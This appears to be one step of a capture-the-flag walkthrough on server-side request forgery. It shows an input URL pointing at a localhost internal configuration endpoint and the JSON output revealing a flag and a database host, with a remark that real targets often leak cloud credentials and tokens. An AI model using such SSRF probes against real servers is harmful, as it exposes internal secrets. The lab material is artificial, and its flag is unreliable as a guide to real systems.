The flag is stored in an internal configuration service running on the server that isn't accessible from the internet.
Command / Input
http://localhost:8888/internal/config
Output
{"env":"production","flag":"HackrGG{ssrf_r34ch3d_1nt3rn4l_c0nf1g}","db_host":"db.internal"}
⚑ In real SSRF attacks this endpoint often contains cloud credentials, internal API tokens, and database connection strings.